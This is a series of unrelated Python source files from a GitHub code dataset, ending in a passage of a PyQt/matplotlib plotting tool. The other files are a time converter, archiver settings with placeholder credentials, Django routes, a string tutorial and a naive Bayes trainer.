median(listaTvå))\n","repo_name":"niklasengvall/programmering1python","sub_path":"Lärobok/kap 9/kap. 9, sid. 109 - returvärde.py","file_name":"kap. 9, sid. 109 - returvärde.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"sv","doc_type":"code","stars":8,"dataset":"github-code","pt":"33"} +{"seq_id":"40760217540","text":"\"\"\"\nFaça um programa que converta da notação de 24 horas para a notação de 12 horas. Por exemplo, o programa deve converter\n14:25 em 2:25 P.M. 
A entrada é dada em dois inteiros. Deve haver pelo menos duas funções: uma para fazer a conversão e\numa para a saída. Registre a informação A.M./P.M. como um valor ‘A’ para A.M. e ‘P’ para P.M. Assim, a função para\nefetuar as conversões terá um parâmetro formal para registrar se é A.M. ou P.M. Inclua um loop que permita que o usuário\nrepita esse cálculo para novos valores de entrada todas as vezes que desejar.\n\n\"\"\"\n\n\ndef converte_horas(horas, minutos):\n lista_horas1 = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]\n lista_horas2 = [13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24]\n if horas in lista_horas1:\n print(f'{horas}:{minutos} AM')\n if horas in lista_horas2:\n indice = lista_horas2.index(horas)\n print(f'{lista_horas1[indice]}:{minutos} PM')\n\n\nwhile True:\n\n print(\"Conversor de horas, formato 24 horas para 12 horas.\\n\")\n hora = int(input('Digite a hora: '))\n minuto = int(input('Digite os minutos: \\n'))\n\n converte_horas(hora, minuto)\n print()\n outro = input('Deseja inserir outro horario? 
[S/N]: ').strip().upper()\n if outro == 'N':\n print(\"Programa finalizado!\")\n break\n if outro not in 'SN':\n print(\"Opção invalida, programa finalizado.\")\n break\n","repo_name":"MrSpock1994/ExerciciosFuncoes","sub_path":"6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"9437930168","text":"### GENERAL SETTINGS ###\nPORT = 7000\nSENTRY_DSN = None\nMAX_FILE_SIZE = None\nHMAC_KEY = 'CHANGEME'\nIGNORE_CALLBACK_SSL = False\nREQUIRE_SIGNED_SUBMITIONS = False\nBROKER_URL = 'amqp://archiver:archiver@192.168.111.112//'\nCALLBACK_ADDRESS = [\n 'http://192.168.111.111:7000/callback',\n 'http://192.168.111.1:5000/api/v1/registration/finished/'\n]\n\n\n### Credentials Options ###\nUSERNAME = 'CHANGEME' # Access key\nPASSWORD = 'CHANGEME' # Secret key\nCONTAINER_NAME = 'CHANGEME' # Bucket name\n\n\n### LibCloud Options ###\nLIBCLOUD_DRIVER = 's3_us_west_oregon'\n\n\n#### FILE STORAGE OPTIONS ####\nBACKEND = 's3' # Options: S3,\nCREATE_PARITIES = True\nIGNORE_PARITIY_SIZE_LIMIT = False\n\n\n#### FILE STORAGE LOCATIONS ####\nFILES_DIR = 'Files/'\nMANIFEST_DIR = 'Manifests/'\nMETADATA_DIR = 'File Metadata/'\nDIRSTRUCT_DIR = 'Directory Structures/'\nPARITY_DIR = 'Parities/'\n\n\n### DEBUGGING OPTIONS ###\nDEBUG = True\nCELERY_SYNC = False # Dont use celery just run everything synchronously\nDUMP_INCOMING_JSON = False\n\n\n#### CELERY OPTIONS ####\nCELERY_TASK_SERIALIZER = 'pickle'\nCELERY_RESULT_SERIALIZER = 'pickle'\nCELERY_ACCEPT_CONTENT = ['pickle', 'json', 'msgpack', 'yaml']\nCELERY_CHORD_PROPAGATES = False\nCELERY_EAGER_PROPAGATES_EXCEPTIONS = CELERY_SYNC\nCELERY_ALWAYS_EAGER = CELERY_SYNC\nCELERY_RESULT_BACKEND = 'amqp'\nCELERY_TASK_RESULT_EXPIRES = 18000 # 5 hours.\nCELERY_TRACK_STARTED = True\nCELERY_IMPORTS = 'archiver.worker.tasks'\nCELERY_REDIRECT_STDOUTS_LEVEL = 'INFO'\nCELERY_ACKS_LATE = True\n# Only process 5k jobs per hour\n# This is to 
deal with API rate limiting\nCELERY_DEFAULT_RATE_LIMIT = '5000/h'\n\n#### CLONER OPTIONS ####\n# Figshare\nFIGSHARE_OAUTH_TOKENS = [\n 'CLIENT ID',\n 'CLIENT SECRET'\n]\n","repo_name":"chennan47/Archiver","sub_path":"archiver/settings/defaults.py","file_name":"defaults.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"33"} +{"seq_id":"42162181151","text":"\nfrom django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"login\", views.login_view, name=\"login\"),\n path(\"logout\", views.logout_view, name=\"logout\"),\n path(\"register\", views.register, name=\"register\"),\n path(\"create_post\", views.create_post, name=\"create_post\"),\n path(\"profile/\", views.profile, name=\"profile\"),\n path(\"following\", views.following, name=\"following\"),\n path(\"follow/\", views.follow, name=\"follow\"), \n path(\"follow_status/\", views.follow_status, name=\"follow_status\"),\n path(\"save_post/\", views.save_post, name=\"save_post\"),\n path(\"like_unlike_post/\", views.like_unlike_post, name=\"like_unlike_post\"),\n path(\"count_likes/\", views.count_likes, name=\"count_likes\")\n]\n","repo_name":"b00gyv00gy/web50-projects-2020-x-network","sub_path":"network/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"31697731456","text":" \n\"\"\"\nBoolean or Bool is a type a constants( e.g integer, float).\nit has only 2 values. True with captial T. And, False with capital F.\n\"\"\"\ndef booleanUse(x):#call like booleanUse(False)\n y = True# example of varible assingment by boolean\n print(y)\n\n if x:# example of using boolean DIRECTLY as condition. 
Same as x == True condition below\n print('true string')\n else:\n print('false string')\n\n if x == True:# example of using boolean INDIRECTLY as condition\n print('true string again')\n else:\n print('false string again')\n\n\"\"\"\nstring is a type of constant in python\ndefined inside single or double quotes\nstringVariable = 'Hello world'\nstring is created using individual characters like above string has first character as 'H'\n\"\"\"\n\ndef stringOperations(x):\n #prints all character of string\n for i in x:\n print(i)\n \n #length of string\n print(len(x))\n\n #accessing a character in string using square brackets [], string is a array of characters and its first character is at 0 and last at length - 1\n print(x[0])#first character\n print(x[ len(x) - 1])#last character\n\n #square brackets can also be used to print all characters in string as following\n #\"IndexError: string index out of range\" if you access a charcter a location more than string length\n j = 0\n while j < len(x):\n print(x[j])\n j+=1\n \n # concatenation two or more strings using + operator\n print( x + \" garima\")\n print( x + \" garima\" +\" mehra\")\n\n # more operations on sting can be found at https://www.w3schools.com/python/python_strings.asp\n\n\n\ndef char_k(x,y):\n if (x[y-1] == 'k'):\n return True\n else:\n return False \n\n\ndef start_end(x,y):\n if (x[y-1] == x[-y]):\n return True\n else:\n return False \n\n\ndef rev_string(x):\n i = 0\n response = ''\n while (i < len(x)):\n response += x[-(i+1)]\n i=i+1\n #print(response)\n return response\n\n\"\"\"\nx 'ankit'\ni 0, 1, 2, 3, 4\nresponse '', 't', 'ti', 'tik', 'tikn', 'tikna'\n\"\"\"\n\n\ndef palindrome(x):\n response ='False'\n i=0\n count=0\n while (i < len(x)/2):\n if (x[i] == x[-(i+1)]):\n count=count+1\n i=i+1\n if ( (len(x)%2 == 0) and (count == len(x)/2) ) or ( (len(x)%2!= 0) and (count== (len(x)+1)/2) ):\n response ='True'\n print(response) \n\n\ndef palindrome_v2(x):\n response = 'True'\n i=0\n while (i < 
len(x)/2):\n if(x[i] != x[-(i+1)]):\n response = 'False' \n break \n i=i+1\n print(response) \n\n\ndef palindrome_v3(x):\n if( x == rev_string(x)):\n print('true')\n else:\n print('false') \n\n\n\n\n\n \n","repo_name":"GarimaMehra/learn_python","sub_path":"BooleansAndString.py","file_name":"BooleansAndString.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"31181307944","text":"#!usr/bin/python\nimport sys\nimport math\nimport os\nimport numpy as np\nfrom collections import defaultdict\nfrom collections import Counter\nimport glob\nimport re\nimport string\nfrom tfidf import *\nfrom preprocess import *\n\n\"\"\"\nTraining file for Naive Bayes program for CSCI 544.\n\nAuthor: Leigh Yeh\nDate: 1/31/2019\nUniversity of Southern California\n\"\"\"\n\ndef load_data():\n all_files = glob.glob(os.path.join(input_path, '*/*/*/*.txt'))\n train = []\n positive_train = []\n truthful_train = []\n\n for file_ in all_files:\n class1, class2, fold, fname = file_.split('/')[-4:]\n text = open(file_).read()\n train.append(text)\n positive_train.append(1) if 'positive' in class1 else positive_train.append(0)\n truthful_train.append(1) if 'truthful' in class2 else truthful_train.append(0)\n\n train = clean(train)\n return train, positive_train, truthful_train\n\ndef get_vocab(text):\n vocab = []\n for doc in text:\n for word in tokenize(doc):\n if word not in stopwords:\n vocab.append(word)\n return list(set(vocab))\n\n\ndef fit(X, y_pos, y_truth):\n label_count = defaultdict(float)\n log_priors = defaultdict(float)\n word_counts = defaultdict(dict)\n n = len(X)\n\n count_pos = Counter(y_pos)\n count_truth = Counter(y_truth)\n label_count['pos'] = count_pos[1]\n label_count['neg'] = count_pos[0]\n label_count['truth'] = count_truth[1]\n label_count['deceptive'] = count_truth[0]\n\n log_priors['pos'] = math.log(label_count['pos'] / n)\n log_priors['neg'] = 
math.log(label_count['neg'] / n)\n log_priors['truth'] = math.log(label_count['truth'] / n)\n log_priors['deceptive'] = math.log(label_count['deceptive'] / n)\n \n # TODO: calculate tfidf vec for each document, then add THAT value instead of just count (rn it's a BoW rep.)\n for text, pos_label, truth_label in zip(X, y_pos, y_truth):\n label1 = 'pos' if pos_label == 1 else 'neg'\n label2 = 'truth' if truth_label == 1 else 'deceptive'\n doc_counts = dict(word_count(tokenize(text)))\n for word, count in doc_counts.items():\n if word in stopwords:\n continue;\n if word not in word_counts[label1]:\n word_counts[label1][word] = 0.0\n if word not in word_counts[label2]:\n word_counts[label2][word] = 0.0\n word_counts[label1][word] += count\n word_counts[label2][word] += count\n return word_counts, log_priors, label_count\n \n\ndef write(write_file):\n columns = ['word','positive', 'negative', 'truthful', 'deceptive']\n write_file.write('-------log priors--------\\n')\n write_file.write('positive, negative, truthful, deceptive\\n')\n log_list = [str(log_priors['pos']), str(log_priors['neg']), str(log_priors['truth']), str(log_priors['deceptive'])] \n write_file.write(','.join(log_list))\n write_file.write('\\n')\n write_file.write('----loglikelihoods for each word and label----\\n')\n write_file.write(','.join(columns))\n write_file.write('\\n')\n\n\n\ndef train():\n write_file = open('nbmodel.txt', 'w')\n write(write_file)\n\n loglikelihood = defaultdict(dict)\n for word in vocab:\n loglikelihood['pos'][word] = math.log((word_counts['pos'].get(word, 0.0) + 1) / (label_count['pos'] + len(vocab)))\n loglikelihood['neg'][word] = math.log((word_counts['neg'].get(word, 0.0) + 1) / (label_count['pos'] + len(vocab)))\n loglikelihood['truth'][word] = math.log((word_counts['truth'].get(word, 0.0) + 1) / (label_count['pos'] + len(vocab)))\n loglikelihood['deceptive'][word] = math.log((word_counts['deceptive'].get(word, 0.0) + 1) / (label_count['pos'] + len(vocab)))\n row = [word, 
str(loglikelihood['pos'][word]), str(loglikelihood['neg'][word]), str(loglikelihood['truth'][word]), str(loglikelihood['deceptive'][word])]\n write_file.write(','.join(row))\n write_file.write('\\n')\n write_file.flush()\n write_file.close()\n\n\nif __name__=='__main__':\n input_path = sys.argv[-1]\n \n X_train, y_train_pos, y_train_truth = load_data()\n\n stopwords = get_stopwords(X_train)\n vocab = get_vocab(X_train)\n word_counts, log_priors, label_count = fit(X_train, y_train_pos, y_train_truth)\n train()\n \n\n\n","repo_name":"lpyeh/USC-CS544","sub_path":"nblearn.py","file_name":"nblearn.py","file_ext":"py","file_size_in_byte":4280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"38136079499","text":"from django.urls import path\nfrom . import views\nurlpatterns = [\n path('todos/', views.TodoListAPIView.as_view(), name='todos_list'),\n path('signup/', views.signup, name='signup'),\n path('login/', views.login, name='login'),\n path('logout/', views.logout, name='logout'),\n path('create/', views.TodoCreateView.as_view(), name='create'),\n path('update//', views.TodoUpdateView.as_view(), name='update'),\n path('detail//', views.TodoDetailView.as_view(), name='detail'),\n path('delete//', views.delete, name='delete'),\n path('complete//', views.complete, name='complete'),\n\n]\n","repo_name":"ikegabriel/todo_api","sub_path":"todo_api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"22720337966","text":"DEBUG=False\r\n\r\ntry:\r\n from PyQt5 import QtCore\r\n from PyQt5.QtCore import QObject\r\n\r\n from PyQt5.QtWidgets import (\r\n QApplication,\r\n QWidget,\r\n QMainWindow,\r\n QMessageBox,\r\n QTabWidget,\r\n QVBoxLayout,\r\n QHBoxLayout,\r\n QLabel,\r\n QLineEdit,\r\n QPushButton,\r\n QScrollArea,)\r\nexcept ImportError as e:\r\n 
print(\"------------------------------\")\r\n print(\"| ERROR |\")\r\n print(\"------------------------------\")\r\n print(\"| Error importing PyQt5. |\")\r\n print(\"| Install PyQt5: |\")\r\n print(\"| 'pip install PyQt5' |\")\r\n print(\"| or |\")\r\n print(\"| 'conda install pyqt' |\")\r\n print(\"------------------------------\")\r\n raise e\r\n\r\nimport pandas\r\n\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nimport sys\r\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigCanvas\r\nfrom matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavBar\r\nfrom matplotlib.widgets import MultiCursor\r\n\r\nimport pyperclip\r\n\r\nimport re\r\n\r\nclass TagInfoRule():\r\n def __init__(self,expr,color=None,sub=r'\\1'):\r\n self.expr = expr\r\n self.rexpr = re.compile(expr)\r\n self.sub = sub\r\n self.color = color\r\n\r\n def get_groupid(self,tagname):\r\n m = self.rexpr.match(tagname)\r\n if m:\r\n if self.sub:\r\n return True, self.rexpr.sub(self.sub,tagname)\r\n else:\r\n return True, None\r\n else:\r\n return False, None\r\n \r\n \r\nclass PlotInfo():\r\n '''\r\n Contains information about one axes.\r\n\r\n Parameters\r\n ----------\r\n tagnames : list\r\n list of tagnames\r\n ax : matplotlib.pyplot.axis\r\n the axis this plotinfo is for\r\n groupid : string\r\n the groupid of this plotinfo/ax\r\n '''\r\n def __init__(self,tagname,groupid,ax):\r\n self.tagnames = [tagname]\r\n self.ax = ax\r\n self.groupid = groupid\r\n\r\nclass TagInfo():\r\n '''\r\n Info about tags (columns in dataframe)\r\n\r\n Attributes:\r\n -----------\r\n name : str\r\n tagname\r\n plotinfo : PlotInfo\r\n info about plot, None if not plotted\r\n groupid : str\r\n tag group id\r\n color : str\r\n color of plot\r\n\r\n '''\r\n\r\n taginfo_rules = [\r\n TagInfoRule(expr=r'(.*)\\.PV$',color='C0'),\r\n TagInfoRule(expr=r'(.*)\\.MEAS$',color='C0'),\r\n TagInfoRule(expr=r'(.*)\\.SP$',color='C1'),\r\n TagInfoRule(expr=r'(.*)\\.SPT$',color='C1'),\r\n 
]\r\n\r\n def __init__(self,tagname):\r\n '''\r\n Constructor\r\n\r\n Parameters:\r\n -----------\r\n tagname : str\r\n name of tag\r\n '''\r\n\r\n self.name = tagname\r\n self.plotinfo = None # points to a plotinfo if tag is plotted\r\n\r\n self.groupid = None\r\n self.color = None\r\n for rule in self.taginfo_rules:\r\n match, gid = rule.get_groupid(self.name)\r\n if match:\r\n if DEBUG:\r\n print('Rule match {} - {}'.format(tagname,rule.expr))\r\n self.groupid=gid\r\n self.color = rule.color\r\n break\r\n\r\n\r\n def set_color(self,color):\r\n sys.stderr.write(\"changing colors is not implemeted yet.\\n'\")\r\n return\r\n\r\n\r\nclass PlotManager(QObject):\r\n '''\r\n Class that manages all the plots.\r\n\r\n '''\r\n\r\n def __init__(self,parent=None):\r\n QObject.__init__(self,parent)\r\n\r\n self._df = None\r\n self.plot_window = PlotWindow()\r\n self.plot_window.home_zoom_signal.connect(self.home_zoom)\r\n\r\n self._plotinfo = [] # list of info about plot\r\n self._groupid_plots = {} # dictionary of plotted groupids\r\n self._taginfo = {} # dictionary of tags\r\n\r\n self.cur = None\r\n\r\n self.legend_loc = 'upper left'\r\n self.legend_fontsize = 8\r\n\r\n def set_dataframe(self,df):\r\n # package function set_dataframe checks that the index is datetime index\r\n\r\n # clear the _taginfo to avoid unnecesary looping in clear_all_plots\r\n self._taginfo.clear()\r\n self.clear_all_plots()\r\n\r\n # Check if there are duplicated columns:\r\n dupcols = df.columns[ df.columns.duplicated() ]\r\n if len(dupcols) > 0:\r\n sys.stderr.write('WARNING: Dataframe has duplicated columns, duplicates are being dropped.\\n')\r\n for c in dupcols:\r\n sys.stderr.write(' Dropping {}\\n'.format(c))\r\n\r\n self._df = df.drop(columns=dupcols)\r\n\r\n for tag in self._df:\r\n # Check if we can plot the tag\r\n dt = self._df[tag].dtype\r\n if dt in (float,int,bool,'int64'):\r\n self._taginfo[tag] = TagInfo(tag)\r\n else:\r\n if DEBUG:\r\n print('Tag {} is not 
plottable'.format(tag))\r\n print(' dtype is {}'.format(dt))\r\n continue\r\n\r\n\r\n def get_tagtools(self):\r\n '''\r\n Get tagtools of all validated _taginfos\r\n '''\r\n tools = [ TagTool(t) for t in self._taginfo ]\r\n for tool in tools:\r\n tool.add_remove_plot.connect(self.add_remove_plot)\r\n\r\n return tools\r\n \r\n\r\n @QtCore.pyqtSlot()\r\n def home_zoom(self):\r\n '''\r\n Sets the zoom level to default.\r\n '''\r\n if DEBUG:\r\n print('PlotManager::home_clicked()')\r\n\r\n try:\r\n #plt.margins(0,0.05)\r\n if len(self._plotinfo) > 0:\r\n for pi in self._plotinfo:\r\n pi.ax.autoscale(axis='x',tight=True)\r\n pi.ax.autoscale(axis='y',tight=False)\r\n self.plot_window.canvas.draw()\r\n\r\n \r\n \r\n except Exception as e:\r\n sys.stderr.write(e)\r\n\r\n @QtCore.pyqtSlot()\r\n def clear_all_plots(self):\r\n if DEBUG:\r\n print('PlotManager::clear_all_plots()')\r\n\r\n try:\r\n \r\n # Clear plot info for all tags (not just the ones that are known to\r\n # be plotted\r\n for t in self._taginfo:\r\n self._taginfo[t].plotinfo = None\r\n \r\n '''\r\n while len(self._plotinfo) > 0:\r\n p = self._plotinfo.pop()\r\n for t in p.tagnames:\r\n self._taginfo[t].plotinfo = None\r\n '''\r\n \r\n self._plotinfo.clear()\r\n self._groupid_plots.clear()\r\n self.plot_window.fig.clear()\r\n self.plot_window.toolbar._nav_stack.clear()\r\n self.plot_window.canvas.draw()\r\n except Exception as e:\r\n sys.stderr.write(e)\r\n \r\n\r\n \r\n @QtCore.pyqtSlot()\r\n def refresh(self):\r\n try:\r\n if DEBUG:\r\n print(\"PlotManager::refresh()\")\r\n\r\n for pi in self._plotinfo:\r\n self.replot(pi)\r\n\r\n self.plot_window.toolbar._nav_stack.clear()\r\n self.plot_window.fig.tight_layout()\r\n self.plot_window.canvas.draw()\r\n except Exception as e:\r\n sys.stderr.write(e)\r\n\r\n def replot(self,plotinfo,save_xlim=False):\r\n '''\r\n Replot the ax in plotinfo. 
Used when adding/removing tags\r\n '''\r\n if DEBUG:\r\n print(\"PlotManager::replot()\")\r\n\r\n if save_xlim:\r\n if DEBUG:\r\n print(\"Saving xlim\")\r\n xlim = plotinfo.ax.get_xlim()\r\n\r\n plotinfo.ax.clear()\r\n\r\n #color = [ self._taginfo[t].color for t in plotinfo.tagnames ]\r\n for tagname in plotinfo.tagnames:\r\n plotinfo.ax.plot(\r\n self._df[tagname],\r\n color=self._taginfo[tagname].color,\r\n label=tagname,\r\n )\r\n plotinfo.ax.legend(loc=self.legend_loc,\r\n fontsize=self.legend_fontsize)\r\n\r\n if save_xlim:\r\n plotinfo.ax.set_xlim(xlim)\r\n else:\r\n plotinfo.ax.autoscale(axis='x',tight=True)\r\n\r\n\r\n\r\n def add_plot(self,tag):\r\n taginfo = self._taginfo[tag]\r\n\r\n if taginfo.plotinfo != None:\r\n sys.stderr.write(\"Tag {} already plotted.\\n\".format(tag))\r\n return\r\n\r\n # check if the groupid has a trend\r\n # but only if groupid is not None\r\n groupid = taginfo.groupid\r\n if groupid and groupid in self._groupid_plots.keys():\r\n # add trend to existing axis\r\n plotinfo = self._groupid_plots[groupid]\r\n plotinfo.tagnames.append(tag)\r\n taginfo.plotinfo = plotinfo\r\n\r\n # Only plot new tag so that zoom doesn't change\r\n if DEBUG:\r\n print(\"Adding tag to axis\")\r\n\r\n #xlim = plotinfo.ax.get_xlim()\r\n\r\n plotinfo.ax.plot(\r\n self._df[tag],\r\n color=taginfo.color,\r\n label=tag,\r\n scalex=False,\r\n )\r\n plotinfo.ax.legend(loc=self.legend_loc,\r\n fontsize=self.legend_fontsize)\r\n '''\r\n self._df[tag].plot(color=taginfo.color,\r\n ax=plotinfo.ax,\r\n legend=True,\r\n include_bool=True)\r\n '''\r\n\r\n #plotinfo.ax.set_xlim(xlim)\r\n\r\n else:\r\n nplots = len(self._plotinfo)\r\n\r\n # make a new trend\r\n if nplots > 0:\r\n sharex = self._plotinfo[0].ax\r\n else:\r\n sharex = None\r\n\r\n # resize existing axes\r\n if DEBUG:\r\n print(\"Resize existing axes\")\r\n gs = matplotlib.gridspec.GridSpec(nplots+1,1)\r\n for i in range(nplots):\r\n self._plotinfo[i].ax.set_position( 
gs[i].get_position(self.plot_window.fig) )\r\n self._plotinfo[i].ax.set_subplotspec( gs[i] )\r\n\r\n if DEBUG:\r\n print(\"Create new axes\")\r\n ax = self.plot_window.fig.add_subplot(\r\n nplots+1,1,nplots+1,\r\n label=groupid,\r\n sharex=sharex\r\n )\r\n\r\n if DEBUG:\r\n print(\"label_outer for all other axis\")\r\n for pi in self._plotinfo:\r\n pi.ax.tick_params(labelbottom=False)\r\n\r\n\r\n plotinfo = PlotInfo(tag,groupid,ax)\r\n self._plotinfo.append(plotinfo)\r\n self._taginfo[tag].plotinfo = plotinfo\r\n if groupid:\r\n self._groupid_plots[groupid] = plotinfo\r\n\r\n \r\n if DEBUG:\r\n print(\"Replotting new axis\")\r\n\r\n self.replot(plotinfo,save_xlim=(sharex!=None))\r\n\r\n if DEBUG:\r\n print(\"Clearing navstack\")\r\n self.plot_window.toolbar._nav_stack.clear()\r\n\r\n self.cur = MultiCursor(\r\n self.plot_window.fig.canvas,\r\n [ pi.ax for pi in self._plotinfo ],\r\n lw=1,\r\n color='red')\r\n\r\n\r\n def remove_plot(self,tag):\r\n taginfo = self._taginfo[tag]\r\n plotinfo = taginfo.plotinfo\r\n if plotinfo == None:\r\n sys.stderr.write(\"Tag {} is not plotted.\\n\".format(tag))\r\n return\r\n\r\n # check if there are other plots in group\r\n if len(plotinfo.tagnames) > 1:\r\n # remove only one line\r\n plotinfo.tagnames.remove(tag)\r\n if DEBUG:\r\n print(\"Removing one variable from list\")\r\n print(\"Remaining tags:\")\r\n print(plotinfo.tagnames)\r\n\r\n self.replot(plotinfo,save_xlim=True)\r\n\r\n else:\r\n # remove whole axes\r\n if DEBUG:\r\n print(\"Removing axis\")\r\n plotinfo.ax.remove()\r\n\r\n self._plotinfo.remove(plotinfo)\r\n\r\n if taginfo.groupid in self._groupid_plots:\r\n del self._groupid_plots[taginfo.groupid] \r\n\r\n nplots = len(self._plotinfo)\r\n if nplots > 0:\r\n gs = matplotlib.gridspec.GridSpec(nplots,1)\r\n for i in range(nplots):\r\n self._plotinfo[i].ax.set_position( gs[i].get_position(self.plot_window.fig) )\r\n self._plotinfo[i].ax.set_subplotspec( gs[i] )\r\n\r\n if len(self._plotinfo) == 0:\r\n if DEBUG:\r\n 
print(\"no more plots left\")\r\n self.plot_window.toolbar._nav_stack.clear()\r\n self.cur = None\r\n \r\n else:\r\n self.cur = MultiCursor(\r\n self.plot_window.fig.canvas,\r\n [ pi.ax for pi in self._plotinfo ],\r\n lw=1,\r\n color='red')\r\n\r\n self._plotinfo[-1].ax.tick_params(labelbottom=True)\r\n\r\n\r\n\r\n taginfo.plotinfo = None\r\n\r\n\r\n @QtCore.pyqtSlot(str,bool)\r\n def add_remove_plot(self,tag,add):\r\n '''\r\n Add/Remove a plot.\r\n\r\n Parameters:\r\n -----------\r\n tag : str\r\n column in dataframe to plot\r\n add : bool\r\n True = add plot, False = remove plot\r\n '''\r\n\r\n if DEBUG:\r\n print(\"PlotManager::add_remove_plot({},{})\".format(tag,add))\r\n\r\n try:\r\n if add:\r\n self.add_plot(tag)\r\n else:\r\n self.remove_plot(tag)\r\n\r\n self.plot_window.canvas.draw()\r\n except Exception as e:\r\n sys.stderr.write('Exception in QtSlot PlotManager::add_remove_plot\\n' \\\r\n + str(e) + '\\n')\r\n\r\n\r\n @QtCore.pyqtSlot()\r\n def showme(self):\r\n '''\r\n Show python code to generate the current figure.\r\n '''\r\n\r\n nrows = len(self._plotinfo)\r\n code = ''\r\n\r\n if nrows > 0:\r\n # Create a copy of the dataframe with only displayed data\r\n # instead of setting xlimits. 
to plot faster.\r\n\r\n # xlimit based on first axes, the rest should be the same\r\n # this code is only executed if there is at least one plot\r\n \r\n if ( type(self._df.index) != pandas.DatetimeIndex):\r\n code += \"df_plot = df\\n\"\r\n else:\r\n xlim = self._plotinfo[0].ax.get_xlim()\r\n x0 = matplotlib.dates.num2date(xlim[0]).strftime('%Y-%m-%d %H:%M')\r\n x1 = matplotlib.dates.num2date(xlim[1]).strftime('%Y-%m-%d %H:%M')\r\n code += \"df_plot = df['\" + x0 + \"':'\" + x1 + \"']\\n\"\r\n\r\n code += 'fig,ax = plt.subplots(nrows={},sharex=True)\\n'.format(nrows)\r\n\r\n i = 0 \r\n for plotinfo in self._plotinfo:\r\n color = []\r\n for tag in plotinfo.tagnames:\r\n color.append( self._taginfo[tag].color )\r\n\r\n ylim = plotinfo.ax.get_ylim()\r\n\r\n code += 'df_plot.plot(\\n' + \\\r\n ' y={},\\n'.format(plotinfo.tagnames) + \\\r\n ' color={},\\n'.format(color) + \\\r\n ' ylim={},\\n'.format(ylim)\r\n\r\n if nrows > 1:\r\n code += ' ax=ax[{}],\\n'.format(i)\r\n else:\r\n code += ' ax=ax,\\n'\r\n \r\n code += ')\\n'\r\n\r\n i += 1\r\n\r\n if type(self.legend_loc) == str:\r\n loccode = \"loc='{}'\".format(self.legend_loc)\r\n else:\r\n loccode = \"loc={}\".format(self.legend_loc)\r\n if type(self.legend_fontsize) == str:\r\n fontcode = \"fontsize='{}'\".format(self.legend_fontsize)\r\n else:\r\n fontcode = \"fontsize={}\".format(self.legend_fontsize)\r\n\r\n code += \"for a in ax:\\n a.legend({},{})\\n\".format(\r\n loccode,fontcode)\r\n code += 'fig.tight_layout()\\n'\r\n\r\n #print(code)\r\n pyperclip.copy(code)\r\n\r\n code = (\"The following is copied to your clipboard:
    \"\r\n + code.replace('\\n','
    ').replace(\" \",' ') )\r\n\r\n QMessageBox.information(None, \"Show Me\",\r\n code,\r\n QMessageBox.Ok, QMessageBox.Ok)\r\n\r\n\r\n \r\n\r\n \r\nclass PlotWindow(QWidget):\r\n '''\r\n A single plot window.\r\n\r\n '''\r\n\r\n # signal is emitted when home is clicked but navstack\r\n # is empty\r\n home_zoom_signal = QtCore.Signal()\r\n \r\n\r\n def __init__(self,parent=None):\r\n QWidget.__init__(self,parent)\r\n\r\n self.fig = plt.figure()\r\n self.canvas = FigCanvas(self.fig)\r\n self.toolbar = NavBar(self.canvas,self)\r\n\r\n layout = QVBoxLayout()\r\n layout.addWidget(self.toolbar)\r\n layout.addWidget(self.canvas)\r\n self.setLayout(layout)\r\n\r\n # find toolbar's home button\r\n home_action = None\r\n for action in self.toolbar.actions():\r\n if action.text() == 'Home':\r\n home_action = action\r\n break\r\n\r\n if home_action == None:\r\n sys.stderr.write('Home action in Qt Navbar not found')\r\n else:\r\n home_action.triggered.connect(self.home_clicked)\r\n\r\n @QtCore.pyqtSlot()\r\n def home_clicked(self):\r\n self.home_zoom_signal.emit()\r\n self.toolbar._nav_stack.clear()\r\n \r\n\r\n\r\n\r\nclass ToolPanel(QWidget):\r\n '''\r\n Widget that contains all the plotting tools.\r\n\r\n\r\n Signals:\r\n --------\r\n showme_clicked\r\n Show Me button clicked\r\n '''\r\n\r\n showme_clicked = QtCore.Signal()\r\n clear_click_signal = QtCore.Signal()\r\n refresh_click_signal = QtCore.Signal()\r\n\r\n def __init__(self,parent=None):\r\n QWidget.__init__(self,parent)\r\n self._tools = []\r\n\r\n showme_button = QPushButton('Show Me')\r\n showme_button.clicked.connect(self.showme_clicked)\r\n\r\n clear_button = QPushButton(\"Clear\")\r\n clear_button.clicked.connect(self.clear_clicked)\r\n\r\n refresh_button = QPushButton(\"Refresh\")\r\n refresh_button.clicked.connect(self.refresh_click_signal)\r\n\r\n self.filter_textbox = QLineEdit()\r\n self.filter_textbox.textChanged.connect(self.filter_changed)\r\n\r\n\r\n # scroll_area is the scroll area that\r\n # will 
